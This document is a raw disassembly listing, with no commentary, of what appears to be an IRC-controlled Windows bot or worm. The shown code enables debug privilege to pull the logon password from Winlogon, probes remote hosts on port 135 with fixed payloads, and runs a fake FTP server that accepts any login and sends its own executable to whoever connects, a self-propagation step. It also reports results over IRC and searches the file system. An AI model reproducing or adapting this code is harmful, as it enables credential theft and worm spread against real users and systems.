push offset dword_439ACC
push [ebp+74h+arg_0]
jnz short loc_403EE6
call sub_403999
jmp short loc_403EEB
; ---------------------------------------------------------------------------
loc_403EE6: ; CODE XREF: sub_403DEF+EE�j
call sub_403B37
loc_403EEB: ; CODE XREF: sub_403DEF+F5�j
test eax, eax
pop ecx
pop ecx
jz short loc_403F33
cmp dword_439ACC, 0
jnz short loc_403F1A
push ebx
push edi
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_29C]
push offset aFindpassTheW_1 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push eax
call sub_416B5D
add esp, 18h
jmp short loc_403F4D
; ---------------------------------------------------------------------------
loc_403F1A: ; CODE XREF: sub_403DEF+109�j
cmp [ebp+74h+var_4], 1
push [ebp+74h+arg_0]
jnz short loc_403F2A
call sub_403C5C
jmp short loc_403F2F
; ---------------------------------------------------------------------------
loc_403F2A: ; CODE XREF: sub_403DEF+132�j
call sub_403CEE
loc_403F2F: ; CODE XREF: sub_403DEF+139�j
pop ecx
push eax
jmp short loc_403F3F
; ---------------------------------------------------------------------------
loc_403F33: ; CODE XREF: sub_403DEF+100�j
push offset aFindpassUnable ; "[FINDPASS]: Unable to find the password"...
jmp short loc_403F3F
; ---------------------------------------------------------------------------
loc_403F3A: ; CODE XREF: sub_403DEF+B5�j
push offset aFindpassUnab_0 ; "[FINDPASS]: Unable to find Winlogon Pro"...
loc_403F3F: ; CODE XREF: sub_403DEF+142�j
; sub_403DEF+149�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_416905
pop ecx
pop ecx
loc_403F4D: ; CODE XREF: sub_403DEF+129�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408C9C
pop ecx
pop ecx
push [ebp+74h+var_8]
call dword_42207C ; FreeLibrary
jmp short loc_403F79
; ---------------------------------------------------------------------------
loc_403F66: ; CODE XREF: sub_403DEF+4E�j
push offset aFindpassFailed ; "[FINDPASS]: Failed to enable Debug Priv"...
loc_403F6B: ; CODE XREF: sub_403DEF+3A�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_416905
pop ecx
pop ecx
loc_403F79: ; CODE XREF: sub_403DEF+175�j
xor esi, esi
cmp [ebp+74h+var_10], esi
jnz short loc_403F9A
push esi
push [ebp+74h+var_14]
lea eax, [ebp+74h+var_29C]
push eax
lea eax, [ebp+74h+var_98]
push eax
push [ebp+74h+var_9C]
call sub_405D20
add esp, 14h
loc_403F9A: ; CODE XREF: sub_403DEF+18F�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_401ECD
push [ebp+74h+var_18]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_403DEF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FB8 proc near ; CODE XREF: sub_403FEB+11C�p
; sub_403FEB+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_403FE0
loc_403FCA: ; CODE XREF: sub_403FB8+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_403FE7
inc eax
cmp eax, edx
jl short loc_403FCA
loc_403FE0: ; CODE XREF: sub_403FB8+10�j
xor al, al
loc_403FE2: ; CODE XREF: sub_403FB8+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403FE7: ; CODE XREF: sub_403FB8+21�j
mov al, 1
jmp short loc_403FE2
sub_403FB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FEB proc near ; CODE XREF: .text:004145A8�p
; .text:00414694�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_416B20
mov eax, [ebp+arg_4]
dec eax
jz short loc_404028
dec eax
jz short loc_404006
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_404006: ; CODE XREF: sub_403FEB+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_43A414 ; inet_addr
push eax
call sub_4018B3
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_404028: ; CODE XREF: sub_403FEB+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_43A39C ; socket
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_40414D
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_43A4F4 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40873C
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_43A34C ; connect
cmp eax, ebx
jz short loc_404097
xor edi, edi
push edi
push 48h
push offset dword_42E508
push esi
call dword_43A438 ; send
cmp eax, ebx
jnz short loc_40409E
loc_404097: ; CODE XREF: sub_403FEB+95�j
; sub_403FEB+CC�j ...
xor esi, esi
jmp loc_404141
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: sub_403FEB+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43A304 ; recv
cmp eax, ebx
jz short loc_404097
cmp [ebp+var_200E], 0Ch
jnz short loc_404097
push edi
push 18h
push offset dword_42E554
push [ebp+arg_4]
call dword_43A438 ; send
cmp eax, ebx
jz short loc_404097
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43A304 ; recv
mov esi, eax
cmp esi, ebx
jz short loc_404097
cmp [ebp+var_200E], 2
jnz short loc_404097
push 10h
push offset loc_42E570
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403FB8
add esp, 10h
test al, al
jz short loc_404121
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_40413F
; ---------------------------------------------------------------------------
loc_404121: ; CODE XREF: sub_403FEB+126�j
push 10h
push offset dword_42E584
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403FB8
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_40413F: ; CODE XREF: sub_403FEB+134�j
mov esi, eax
loc_404141: ; CODE XREF: sub_403FEB+AE�j
push [ebp+arg_4]
call dword_43A4B0 ; closesocket
mov eax, esi
pop edi
loc_40414D: ; CODE XREF: sub_403FEB+57�j
pop esi
pop ebx
leave
retn
sub_403FEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404151 proc near ; CODE XREF: sub_404260+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call dword_422204
push 0
push 1
push 2
call dword_422208
push [ebp+arg_0]
mov dword_439EE0, eax
mov [ebp+var_10], 2
call dword_42220C
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_422210
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_439EE0
call dword_422214
cmp eax, 0FFFFFFFFh
jnz short loc_4041C9
push dword_439EE0
call dword_422218
call dword_42221C
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4041C9: ; CODE XREF: sub_404151+60�j
xor eax, eax
inc eax
leave
retn
sub_404151 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041CE proc near ; CODE XREF: sub_404260+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call dword_42200C ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_422998
push eax
call sub_41719C
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_40423B
jmp short loc_40425D
; ---------------------------------------------------------------------------
loc_404207: ; CODE XREF: sub_4041CE+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_416F47
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_439EE0
call dword_422200
push 1
call dword_422000 ; Sleep
loc_40423B: ; CODE XREF: sub_4041CE+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_404207
call sub_416E0D
pop ecx
push dword_439EE0
call dword_422218
call dword_42221C
xor eax, eax
inc eax
loc_40425D: ; CODE XREF: sub_4041CE+37�j
pop esi
leave
retn
sub_4041CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_404260 proc near ; DATA XREF: sub_401141+240�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call dword_422204
push esi
call sub_417740
push eax
call sub_41698D
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_439EE4, eax
call dword_422208
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call dword_4221E0
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call dword_4221E4
xor eax, eax
mov ax, word ptr dword_439EE4
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call dword_422210
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call dword_4221E8
test eax, eax
jl loc_4047FA
push 0Ah
push ebx
call dword_4221EC
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call dword_4221F0
cmp eax, 0FFFFFFFFh
jz loc_4047FA
mov ebx, dword_422200
loc_40437F: ; CODE XREF: sub_404260+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_4047C9
loc_40438D: ; CODE XREF: sub_404260+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_4218C0
test eax, eax
jz loc_4047BC
cmp esi, [ebp+74h+var_8]
jnz short loc_404427
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call dword_4221F8
cmp eax, 0FFFFFFFFh
jz loc_4047BC
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_4043F9
loc_4043EB: ; CODE XREF: sub_404260+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_4043F9
inc ecx
cmp ecx, edx
jb short loc_4043EB
loc_4043F9: ; CODE XREF: sub_404260+189�j
; sub_404260+192�j
cmp ecx, edx
jnz short loc_40440F
cmp edx, 40h
jnb short loc_40440F
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_40440F: ; CODE XREF: sub_404260+19B�j
; sub_404260+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_404417
mov [ebp+74h+var_4], eax
loc_404417: ; CODE XREF: sub_404260+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx
jmp loc_4047BC
; ---------------------------------------------------------------------------
loc_404427: ; CODE XREF: sub_404260+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call dword_4221FC
test eax, eax
jg short loc_404485
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_404479
loc_404449: ; CODE XREF: sub_404260+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_40446E
inc eax
cmp eax, ecx
jb short loc_404449
jmp short loc_404479
; ---------------------------------------------------------------------------
loc_404459: ; CODE XREF: sub_404260+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_40446E: ; CODE XREF: sub_404260+1F0�j
dec ecx
cmp eax, ecx
jb short loc_404459
dec [ebp+74h+var_228]
loc_404479: ; CODE XREF: sub_404260+1E7�j
; sub_404260+1F7�j
push esi
call dword_422218
jmp loc_4047BC
; ---------------------------------------------------------------------------
loc_404485: ; CODE XREF: sub_404260+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_1 ; "%s %s"
push eax
call sub_416AE4
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_4044C4
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_4044C4: ; CODE XREF: sub_404260+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_4044E1
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_4044E1: ; CODE XREF: sub_404260+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_4044FE
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_4044FE: ; CODE XREF: sub_404260+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_40451B
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_40451B: ; CODE XREF: sub_404260+2AC�j
push 4
mov edi, offset off_4231E0
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_404539
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_404539: ; CODE XREF: sub_404260+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_40456C
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40456C
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_40456C: ; CODE XREF: sub_404260+2E9�j
; sub_404260+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_40459D
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40459D
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_40459D: ; CODE XREF: sub_404260+31A�j
; sub_404260+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_4045DC
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_4045C8: ; CODE XREF: sub_404260+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045C8
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_404610
; ---------------------------------------------------------------------------
loc_4045DC: ; CODE XREF: sub_404260+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_404616
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_404601: ; CODE XREF: sub_404260+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404601
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_404610: ; CODE XREF: sub_404260+37A�j
push eax
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_404616: ; CODE XREF: sub_404260+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_4046DA
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_416AE4
lea eax, [ebp+74h+var_F8]
push eax
call sub_416C92
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_416C92
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_416905
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_417729
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_416905
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_4047A7
; ---------------------------------------------------------------------------
loc_4046DA: ; CODE XREF: sub_404260+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40478F
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_404151
cmp eax, 1
pop ecx
pop ecx
jnz short loc_404784
call sub_4041CE
cmp eax, 1
jnz loc_4047AC
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_416905
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_404775
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_405D20
add esp, 14h
loc_404775: ; CODE XREF: sub_404260+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401ECD
pop ecx
jmp short loc_4047AC
; ---------------------------------------------------------------------------
loc_404784: ; CODE XREF: sub_404260+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4047A7
; ---------------------------------------------------------------------------
loc_40478F: ; CODE XREF: sub_404260+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_4047AC
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_4047A7: ; CODE XREF: sub_404260+25F�j
; sub_404260+27C�j ...
push [ebp+74h+arg_0]
call ebx
loc_4047AC: ; CODE XREF: sub_404260+4B6�j
; sub_404260+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_4047BC: ; CODE XREF: sub_404260+151�j
; sub_404260+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_40438D
loc_4047C9: ; CODE XREF: sub_404260+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call dword_4221F0
cmp eax, 0FFFFFFFFh
jnz loc_40437F
loc_4047FA: ; CODE XREF: sub_404260+C9�j
; sub_404260+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_404260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404807 proc near ; CODE XREF: sub_405121+149�p
; sub_409806+3F3C�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_4236F8 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_417779
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_404860
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
add esp, 14h
jmp loc_40497D
; ---------------------------------------------------------------------------
loc_404860: ; CODE XREF: sub_404807+34�j
cmp [ebp+arg_C], ebx
jz loc_404962
mov eax, edi
lea ecx, [eax+1]
loc_40486E: ; CODE XREF: sub_404807+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40486E
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40489F: ; CODE XREF: sub_404807+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40489F
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_4048D9: ; CODE XREF: sub_404807+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4048D9
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
mov eax, edi
lea ecx, [eax+1]
loc_4048F9: ; CODE XREF: sub_404807+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4048F9
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_404930: ; CODE XREF: sub_404807+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404930
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
add esp, 0Ch
jmp short loc_40497D
; ---------------------------------------------------------------------------
loc_404962: ; CODE XREF: sub_404807+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
add esp, 10h
loc_40497D: ; CODE XREF: sub_404807+54�j
; sub_404807+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404986: ; CODE XREF: sub_404807+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404986
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_404A30
lea edx, [eax+1]
loc_4049AF: ; CODE XREF: sub_404807+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4049AF
sub eax, edx
cmp eax, 2
jbe short loc_404A30
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_4049C3: ; CODE XREF: sub_404807+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4049C3
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_4049DF
loc_4049D3: ; CODE XREF: sub_404807+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4049DF
dec eax
jnz short loc_4049D3
loc_4049DF: ; CODE XREF: sub_404807+1CA�j
; sub_404807+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_4169C0
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_404A15: ; CODE XREF: sub_404807+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404A15
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
loc_404A30: ; CODE XREF: sub_404807+19F�j
; sub_404807+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call dword_422054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call dword_422050 ; FindNextFileA
test eax, eax
jz loc_404E5D
mov ebx, 1FFh
loc_404A5C: ; CODE XREF: sub_404807+650�j
cmp [ebp+var_38C], 0
jz loc_404E45
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404E45
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404E45
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call dword_422068 ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call dword_422064 ; FileTimeToSystemTime
